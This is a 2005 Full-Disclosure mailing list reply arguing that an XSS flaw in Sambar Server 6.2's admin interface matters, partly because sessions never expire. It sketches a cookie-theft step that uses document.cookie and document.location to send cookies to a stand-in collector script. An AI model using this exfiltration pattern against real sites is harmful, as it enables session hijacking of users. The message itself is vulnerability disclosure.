mailing list archives
Re: XSS in Sambar Server version 6.2
From: jamie fisher <contact_jamie_fisher () yahoo co uk>
Date: Tue, 24 May 2005 21:30:13 +0100 (BST)
"A user can input a specially crafted script that when rendered by the
Hopefully you can explain:
"Multiple XSS found in the administrative interface."
This kind of pre-supposes the idea that a user has access to the administrative interface. The tests I ran were
purely looking at what somebody with priviliged rights could have effected within the application. For
clarification, a user is by default somebody who is "identified" and then "authorised" to the system. In the case
of Sambar Server version 6.2 this is done through the mandatory access control of username and password. The system
in this case is the "administrative interface".
Granted, the XSS is a very low level vulnerability. However, combine the XSS with the ability to (document.cookie) and
a document.location="http://domain.com/cookiecollector.pl" which logs the users cookie then this becomes more of an
issue. Incidentally, did you know the application does not expire session states, i.e., if I log off or kill my
session with the browser or otherwise and a miscreant (somebody who uses a Lynx browser) , e.g., You, conspires to
obtain my user identity - in this case we're using the example of the cookie - then certainly this issue certainly
becomes one of a high level issue.
From personal experience I know you've run across plenty of XSS issues before, we've both discussed where we've
collided in previous job roles. I guess, in a nut shell it shows how little input/output validation is occuring
throughout the application and what a user if so inclined, can force the application into rendering. But really, I
used to point out input/output validation issues to you along with the other stuff you used to miss in your web
application pen tests.
P.S. There'll be plenty of other issues (other than XSS) I'll publish re: Sambar Server 6.2. I haven't got a problem
if you would like to work with me in researching bugs/problems/issues. It's just a matter of trying to work with the
vendor to help find understand the issues/apply a patch. And btw, this isn't a personal attack against you either =)
Does your mail provider give you FREE antivirus protection?
Get Yahoo! Mail
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/